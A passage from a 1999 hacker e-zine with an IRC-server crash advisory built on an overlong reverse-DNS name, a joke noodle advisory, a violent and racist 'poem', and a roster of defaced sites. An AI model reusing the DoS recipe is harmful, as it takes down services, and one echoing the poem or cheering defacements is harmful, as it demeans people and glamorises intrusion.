Some domains and IP's listed here where substituted by fake ones, by their owners desire, but the examples are 100% true, and realy tested) I found this "bug" while trying to make a BIG sub-domain on my name server, what i just did was on my named.conf put: A.fccn.deve.estar.enganada.este.e.que.deve.ser.o.maior.nome.de.uma.maquina.e m.portugal IN A 111.111.111.111 111.111.111.111.in-addr IN PTR A.fccn.deve.estar.enganada.este.e.que.deve.ser.o.maior.nome.de.uma.maquina.e m.portugal.xxxxxxx.pt. Changed the serial and did named.restart checked for it (if it's working or not). nslookup Default Server: ptm-1.xxxxxxx.pt Address: 111.111.111.2 > 111.111.111.111 Server: ptm-1.xxxxxxx.pt Address: 111.111.111.2 Name: A.fccn.deve.estar.enganada.este.e.que.deve.ser.o.maior.nome.de.uma.maquina.e m.portugal.xxxxxxxx.pt Address: 111.111.111.111 Well it was working, i now had a ip <-> name (resolving ip) So i decides to go to a Portuguese irc network (irc.ptlink.net), to my amaze the server crashed (only the ircd) when trying to resolve my ip, i tried another server and got the same result. I did some more checking and found it to be vurnerable, it was running Elite.PTlink3.3.1 a modified version of Elite ircd's. I probed arround for another ircd software and i found another network runnig u.2.9.32 (a undernet ircd) tried it and found it to be also vurlnerable. Continuing i tried it on Ptnet version PTnet1.5.39F witch is based on Dalnet's ircd's and found it to NOT be vurnerable , when i connected it tried to resolve my ip and failed, but it didnt crash, it continued the connection normaly. So let me put this on a small list of affected IRCd's. Vurnerable: Elite ircd (versions unknown) Ptlink ircd (all versions) Undernet ircd (u.2.9.32) Not vulnerable: Ptnet (versions unknow and 1.5.39F) (Note that this DoS could be applied for many other things) Any questions about this DoS in ircd's please mail me if a valid request i would be glad to help. Pedro Reis ( Goblin ) @ Portugal (irc.ptlink.net) @HWA -=----------=- -=----------=- -=----------=- -=----------=- 0 0 0 o O O O 0 =----------=- -=----------=- -=----------=- -=----------=- -=----------=- =----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** When people ask you "Who is Kevin Mitnick?" do you have an answer? www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre http://www.2600.com/ http://www.kevinmitnick.com +-----------------------------------------------------------------------------+ | SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE | | =================== http://smog.cjb.net/ NEWS on SECURITY | | NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET | | http://smog.cjb.net/ NEWS on TECHNOLOGY | +-----------------------------------------------------------------------------+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * http://www.csoft.net" One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // // or cruciphux@dok.org // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous... So, you want a puzzle do you? well crack the 'code' at the beginning and end of the newsletter only one person has done it so far, so go ahead get your crypto sk1llz out and try cracking it. its easy! ____ _ _ _ _ _ / ___| ___ _ __ __| (_)_ __ _ _ ___ _ _ _ __ / \ ___ ___(_|_) \___ \ / _ \ '_ \ / _` | | '_ \| | | |/ _ \| | | | '__| / _ \ / __|/ __| | | ___) | __/ | | | (_| | | | | | |_| | (_) | |_| | | / ___ \\__ \ (__| | | |____/ \___|_| |_|\__,_|_|_| |_|\__, |\___/ \__,_|_| /_/ \_\___/\___|_|_| |___/ / \ _ __| |_ / _ \ | '__| __| / ___ \| | | |_ /_/ \_\_| \__| TOO, for inclusion in future issues Do the HWA logo etc and we'll showcase it here to show off your talents...remember the 80's? dig out those ascii editors and do yer best... _| _|_|_| _|_| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _|_|_| _|_| _|_| _| _|_| _| _|_| _| _|_| _|_| _|_| _|_|_|_| _| _|_| _| _| _| _| _| _|_| _| _| _| _| _| _| _| _|_| _|_| _|_| _| _________________________ /| /| | | ||__|| | HAX0R FOR HIRE ... | / O O\__ WILL HACK FOR NUDE PICS| / \ OF SARAH MICHELLE | / \ \ GELLER! (BUFFY) | / _ \ \ --------------------- / |\____\ \ || / | | | |\____/ || / \|_|_|/ | __|| / / \ |____| || / | | /| | --| | | |// |____ --| * _ | |_|_|_| | \-/ *-- _--\ _ \ // | / _ \\ _ // | / * / \_ /- | - | | * ___ c_c_c_C/ \C_c_c_c____________ _________ (Ascii art from V0iD magazine #7) Buffer Overflow Found in Instant Lunch From HNN http://www.hackernews.com/ contributed by Dr. Mudge A very large and serious security issue has been uncovered involving a buffer overflow with Maruchan's Instant Lunch. Instant Lunch is a dried soup product relied on by many people for nourishment. If the documentation for its use is followed a possible buffer overflow may result seriously injuring the user. Other products, such as Cup O Noodles, may also be affected. Instant Lunch Advisory http://legions.org/~optik/ins_advise.txt Advisory: Buffer Overflow in Instant Lunch Author: optiklenz legions.org/~optik Contact: optik@shockimaging.com optik@legions.org "At two minutes and thirty seconds the darn thing overflows" Overview: "As a [hot] snack or delicious meal-anytime" I came home and was hungry, and had to get to work right away so I popped a Instant Lunch in the microwave the end results will shock you!. The cover of Maruchan's Instant Lunch says ready in 3 minutes. that is definitely not the case. Upon completing extensive research I found that during the second minute Instant Lunch is susceptible to a buffer overflow. The directions on the back are as follows: 1. Fold back lid half way. fill to inside line with "boiling" water 2. Close lid "securely" and let stand 3minutes. 3. Remove lid, stir and enjoy from cup. There is absolutely no truth in the above process, and I have written Maruchen himself, and have asked him to re-write the instructions on how to prepare the noodles. My remarks on their directions below: 1. If the waters already boiled why would they put the Instant lunch in the microwave?! HUH? HUH? This is clearly an error on your part. 2. During my research I found that even placing a metal object on top of my Instant Lunch didn't keep the water from overflowing once it hits the two and a half minute mark. It did however start shooting sparks off everywhere. I will have to investigate this some more. 3. "enjoy" Yes enjoy a nice mess... (assholes).. I'm sorry I didn't mean to call you assholes it's just sometimes I get emotional over certain topics. Remotely Overflowing the Water: My microwave has a USB port so I was able to create an application that would control the microwave from a computer in my room. Example: [darkone] ps -aux microwave 3 0.0 0.5 1692 948 pts/3 S 19:23 0:00 - instant_lunchd [darkone] ./instant_lunch microwave offset 31337 Total_Fat 12g \x8d\x5e\x17 0:3/0; 8/FF; F/'b1100X1X0;.../micro/ Water overflowed.... This seems to effect Cup O Noodles too, but I'll have to do more testing. The versions of Instant Lunch I've tested thus far are Roast Beef Flavor Chicken Vegetable Flavor Creme of Chicken Flavor California Flavor Solution: There is currently no patch or fix for this overflow. There is however a fix for remote attacks. Simply comment out microwave services in inetd.conf. ---------------------------------------------------- optiklenz was Interviewed by Bob Mathers of the Daily Food. ------------------------------------------------------ so what do you say to the vendors that make these seemingly wholesome food products. Well Bob I say that had they done proper testing we'd have much more happy noodle eaters. Is this a high risk? Your damn skippy Bob. I mean innocent people are being hurt by the hot water that spews from these poor excuses of a lunch time meal. It's also painful to see people traumatized by the lack of flavor that is expected in every bite do to some of it escaping with the overflow. How big is the problem As far as I know this is an international incident. I did a study and apparently 90% of these food products are vulnerable to this overflow. People everywhere eat Instant Lunch... china, iraq, yogoslavy People like you should be rewarded for your research yet you do this for free am I correct? It's all apart of making this world a safer place Bob. I mean If I don't let people know about these serious issues someone can maliciously buffer overflow someone's food. Their only source of nutrition. People are dying Bob! Well there you have it folks.. optiklenz.. A hacker a hero. A modern day saint. That's all we have for tonight. Tune in next time when we'll bring you an inside look at how cows are slaughtered with a special guest appearence from the cDc. OPTIK FOR PRESIDENT IN 2000 Scary prose from the underground ... _________ _____ _________ / ____// ____\/ _____/ \_____ \\ __\ \_____ \ / \| | / \ /_______ /|__| /_______ / \/ \/ SiCK FUCK SQUAD ! Mindfuckin' you since 1999 ! TiTLE: kids AUTHoR: Max0r !-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-! whoops, you wanted me to pull out? quiet bitch, don't scream and shout! You can get an abortion, so chill it's not hard for cum to spill Hell no you aint keeping the baby you're dad will shoot me, there's no maybe. if you have that kid i'll kill you both trust me, shotguns stunt your growth don't cry, theres a simple solution run away, so I don't face prosecution maybe you could smoke alot of crack that way your dad thinks the father was black don't end up like that bitch rhonda she got run over by a two door honda listen bitch i gotta run I DONT WANT NO FUCKING SON!!! ~EOF -------------------=====------- want to contribute? think your fucked up enough? sfsquad@yahoo.com @HWA SITE.1 http://www.hack.co.za/ You can Send in submissions for this section too if you've found (or RUN) a cool site... @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Hacker groups breakdown is available at Attrition.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist. >Start< Last week attrition took a bit of a vacation but they're back with more defacements listed below; We've come across the first Microsoft defacement we've ever recorded. As you know we've scoured through some of the top mirrors to ensure Attrition's historic accuracy (http://www.attrition.org/mirror) and none of those included a Microsoft defacement either: Lots of .gov and .mil servers have been hit this week, looks like people have been active playing with fire... lets hope this doesn't bring down a whole new hacker witch hunt from the feds. - Ed Defaced domain: www.redcrossblood.org Mirror: http://www.attrition.org/mirror/attrition/1999/10/31/www.redcrossblood.org Defaced by: hacking for ponies Operating System: Solaris Defaced domain: www.westmount.cx Mirror: http://www.attrition.org/mirror/attrition/1999/10/31/www.westmount.cx Defaced by: sh0rt and GBMP Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.3.9) Date 10/31/99 Defaced domain: peoavn.redstone.army.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/peoavn.redstone.army.mil Defaced by: phreak.nl Operating System: NT Date 10/26/99 Defaced domain: www.anti-hacker.org Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.anti-hacker.org Defaced by: PsychoKid Operating System: Windows NT Defaced domain: www.nuggz.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.nuggz.com Defaced by: Thought Criminal Operating System: Linux Date 10/26/99 Defaced domain: www.denhaag.nl Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.denhaag.nl Defaced by: The Millenniumbugz Operating System: Windows NT Date 10/26/99 Defaced domain: newnet.jdola.lanl.gov Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/newnet.jdola.lanl.gov Defaced by: s0ften Operating System: Windows NT Date 10/26/99 Defaced domain: www.protesis.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.protesis.com Defaced by: Nemesystm Operating System: Windows NT Date 10/26/99 Defaced domain: www.ncsc.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.ncsc.navy.mil Defaced by: flipz Operating System: Windows NT Date 10/26/99 Defaced domain: www.pr.doe.gov Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.pr.doe.gov Defaced by: flipz Operating System: Windows NT Date 10/27/99 Defaced domain: www.hanford.gov Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.hanford.gov Defaced by: flipz Operating System: Windows NT Date 10/27/99 Defaced domain: www.georgemag.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.georgemag.com Defaced by: ULG Operating System: Windows NT Date 10/27/99 Defaced domain: www.protesis.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.protesis.com Defaced by: Contr0l C Operating System: Windows NT Date 10/27/99 Defaced domain: www.firephotos.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.firephotos.com Defaced by: JxLxMx Operating System: Windows NT (IIS/4.0) Date 10/27/99 Defaced domain: www.andersen.af.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.andersen.af.mil Defaced by: flipz Operating System: Windows NT (IIS/4.0) Date 10/27/99 Defaced domain: www.iww.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.iww.com Operating System: Windows NT (WebSitePro/2.3.7) Date 10/27/99 Defaced domain: www.expresssupplies.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.expresssupplies.com Defaced by: sortof Operating System: Windows NT (WebSitePro/2.3.7) Date 10/27/99 Defaced domain: www.madboss.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.madboss.com Defaced by: sortof Operating System: Windows NT (WebSitePro/2.3.7) Daate 10/27/99 Defaced domain: agent.cccp-duma.kgb.gov.ussr.com.ru Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/agent.cccp-duma.kgb.gov.ussr.com.ru Operating System: Solaris (Apache/1.3.3) Date 10/27/99 Defaced domain: www.hao.org Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.hao.org Defaced by: JxLxMxbr Operating System: BSDI Date 10/27/99 Defaced domain: www.top100.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.top100.com Defaced by: mesmes Operating System: Windows NT (IIS/4 Date 10/27/99 Defaced domain: www.labinco.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.labinco.com Defaced by: DHC Operating System: NT Date 10/27/99 Defaced domain: scotty.navsses.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/scotty.navsses.navy.mil Defaced by: fuqbag Operating System: NT Date 10/27/99 Defaced domain: eagle.chtwl.spear.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/eagle.chtwl.spear.navy.mil Defaced by: fuqrag Operating System: NT Date 10/27/99 Defaced domain: www.csp.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.csp.navy.mil Defaced by: fuqrag Operating System: NT Date 10/27/99 Defaced domain: www.fmcs.gov Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.fmcs.gov Defaced by: fuqbag Operating System: NT Date 10/27/99 Defaced domain: www.amsc.belvoir.army.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.amsc.belvoir.army.mil Defaced by: Pakistan Hackerz Club Operating System: NT Date 10/27/99 Defaced domain: www.buytwinhead.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.buytwinhead.com Defaced by: UBT Operating System: BSD/OS (Apache/1.2.6 FrontPage/3.0.4) Date 10/27/99 Defaced domain: www.hio.ft.hanze.nl Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.hio.ft.hanze.nl Defaced by: Scrippie Operating System: Windows NT (IIS/4.0) Date 10/27/99 Defaced domain: www.dinfos.osd.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.dinfos.osd.mil Defaced by: fuqrag Operating System: Windows NT (IIS/4.0) Date 10/27/99 Defaced domain: www.usitc.gov Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.usitc.gov Defaced by: fuqrag Operating System: NT Date 10/27/99 Defaced domain: www.nsg.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.nsg.navy.mil Defaced by: fuqrag Operating System: NT Date 10/28/99 Defaced domain: www.supertec.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.supertec.com Defaced by: h1gh Operating System: NT Date 10/28/99 Defaced domain: www.schoolgirlporn.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.schoolgirlporn.com Defaced by: hacking 4 p0nies Operating System: Solaris Date 10/28/99 Defaced domain: www.dairyqueen.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.dairyqueen.com Defaced by: fuqrag Operating System: NT Date 10/28/99 Defaced domain: www.whitehouseconstruction.co.uk Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.whitehouseconstruction.co.uk Defaced by: vendetta Operating System: Solaris Date 10/28/99 Defaced domain: www.mcbh.usmc.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.mcbh.usmc.mil Defaced by: fuqrag Operating System: NT Date 10/28/99 Defaced domain: www.peritech.co.uk Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.peritech.co.uk Defaced by: vendetta Operating System: Solaris Date 10/28/99 Defaced domain: brongs.co.kr Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/brongs.co.kr Defaced by: The New World Order Operating System: Linux Date 10/28/99 Defaced domain: fourier.snu.ac.kr Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/fourier.snu.ac.kr Defaced by: The New World Order Operating System: Linux Date 10/29/99 Defaced domain: hotnet.gq.nu Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/hotnet.gq.nu Defaced by: The New World Order Operating System: Linux Date 10/28/99 Defaced domain: www.science.sp-agency.ca Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.science.sp-agency.ca Defaced by: F.A.D.F.U.C.K. Operating System: NT Date 10/28/99 Defaced domain: www.themilitarycoalition.org Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.themilitarycoalition.org Defaced by: Pakistan Hackerz Club Operating System: NT Date 10/28/99 Defaced domain: www.mcu.usmc.mil (Marine Corps University) Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.mcu.usmc.mil Defaced by: Pakistan Hackerz Club Operating System: NT Date 10/28/99 Defaced domain: www.zoo.co.uk Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.zoo.co.uk Defaced by: vendetta Date 10/28/99 Defaced domain: dominia.elmnet.net Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/dominia.elmnet.net Defaced by: dewm Operating System: Linux Date 10/28/99 Defaced domain: www.chesterfield.nl Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.chesterfield.nl Defaced by: Zelda and Mario Operating System: NT Date 10/28/99 Defaced domain: www.marcostuds.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.marcostuds.com Defaced by: p4riah Operating System: NT Date 10/28/99 Defaced domain: police1.ucr.edu Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/police1.ucr.edu Defaced by: thecraft Operating System: NT Date 10/29/99 Defaced domain: www.nctsfe.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.nctsfe.navy.mil Defaced by: flipz Operating System: NT Defaced domain: www.subasesd.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.subasesd.navy.mil Defaced by: flipz Operating System: NT Date 10/29/99 Defaced domain: www.mms.gov Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.mms.gov Defaced by: fuqraq Operating System: NT Date 10/29/99 Defaced domain: www.weather.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.weather.com Defaced by: hi-tech hate Operating System: Solaris Date 10/29/99 Defaced domain: www.covlink.co.uk Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.covlink.co.uk Defaced by: narcissus Operating System: NT Date 10/29/99 Defaced domain: apps.opm.gov Mirror: http://www.attrition.org/mirror/attrition/1999/10/29/apps.opm.gov Defaced by: fuqrag Operating System: NT Date 10/29/99 Defaced domain: www.ammar.com.pk Mirror: http://www.attrition.org/mirror/attrition/1999/10/29/www.ammar.com.pk Defaced by: h1gh Operating System: FreeBSD Date 10/29/99 Defaced domain: www.firephotos.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/29/www.firephotos.com Operating System: NT Date 10/29/99 Defaced domain: secure01.clubi.net Mirror: http://www.attrition.org/mirror/attrition/1999/10/29/secure01.clubi.net Defaced by: Blade Operating System: NT Date 10/29/99 Defaced domain: www.adbholdings.com.au Mirror: http://www.attrition.org/mirror/attrition/1999/10/29/www.adbholdings.com.au Defaced by: The Dutch God Date 10/29/99 Defaced domain: www.hao.org Mirror: http://www.attrition.org/mirror/attrition/1999/10/29/www.hao.org Operating System: BSDI Date 10/29/99 Defaced: http://www.ncsc.navy.mil Date: 10/26/99 One line hack: "flipz was here. And nO i am not gay. losers. Well I am sure I am going to get raided now and if i dont the NSA and the DOD are not doing there jobs. hehe. paged edited by: flipz " Defaced: http://www.usarc.army.mil (US Army Reserve Command) Date: 10/20/99 Defaced: http://www.wsmr.army.mil (White Sands Missle Range) Date: 10/23/99 Defaced: http://msrconf.microsoft.com/CMT/ (Microsoft's Conference Management Server) Date: 10/24/99 Defaced: http://www.dencom.army.mil (US Army Dental Care System) Date: 10/24/99 Defaced: http://www.massolant.navy.mil (Navy Management System Support Office) Date: 10/24/99 Defaced: http://www.va.gov (Department of Vetrans Affairs) Date: 10/25/99 Defaced domain: www.travelbybenny.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.travelbybenny.com/ Date: 10/25/99 Defaced domain: posilogic.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/posilogic.com/ Date: 10/25/99 Defaced domain: www.unrealwebs.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.unrealwebs.com/ Date: 10/25/99 Defaced domain: www.muddle.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.muddle.com/ Date: 10/25/99 Defaced domain: www.mulberrytech.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.mulberrytech.com/ Date: 10/25/99 Defaced domain: www.muddle.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.muddle.com/ Date: 10/25/99 Defaced domain: www.almo.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.almo.com/ Date: 10/25/99 Defaced domain: www.shields-gazette.co.uk Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.shields-gazette.co.uk/ Defaced by: KES Operating System: Solaris Date: 10/25/99 Defaced domain: www.acm-ul.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.acm-ul.com/ Defaced by: p4riah Operating System: Windows_NT Date: 10/25/99 Defaced domain: www.lrce.org Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.lrce.org/ Defaced by: p4riah Operating System: Windows_NT Date: 10/25/99 Defaced domain: www.webdesign.f2s.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.webdesign.f2s.com/ Defaced by: RedAttack Operating System: Linux Date: 10/25/99 Defaced domain: www.samhsa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.samhsa.gov Defaced by: flipz Operating System: Windows NT Date: 10/25/99 Defaced domain: www.adfinder.co.uk Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.adfinder.co.uk Defaced by: Narcissus Operating System: Windows NT (WebSitePro/2.0.37) Date: 10/25/99 Defaced domain: www.ndu.edu Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.ndu.edu Defaced by: phreak.nl Operating System: NT Date: 10/25/99 Defaced domain: acquisition.jpl.nasa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/acquisition.jpl.nasa.gov Defaced by: phreak.nl Operating System: NT Date: 10/25/99 Defaced domain: peoavn.redstone.army.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/peoavn.redstone.army.mil Defaced by: phreak.nl Operating System: NT and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW ** http://net-security.org/hwahaxornews ** NEW ** http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW ** http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Brasil........: http://www.psynet.net/ka0z s http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Croatia.......: http://security.monitor.hr Columbia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. ___ _ _ _ |_ _| | | | __ _| |_ ___ | || |_| |/ _` | __/ _ \ | || _ | (_| | || __/ __|___|_| |_|\__,_|\__\___| _ / ___|| |_ _ _ _ __ (_) __| | \___ \| __| | | | '_ \| |/ _` | ___) | |_| |_| | |_) | | (_| | |____/ \__|\__,_| .__/|_|\__,_| | _ \ ___ ___ |_|__ | | ___ | |_) / _ \/ _ \| '_ \| |/ _ \ | __/ __/ (_) | |_) | | __/ |_| \___|\___/| .__/|_|\___| |_| @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]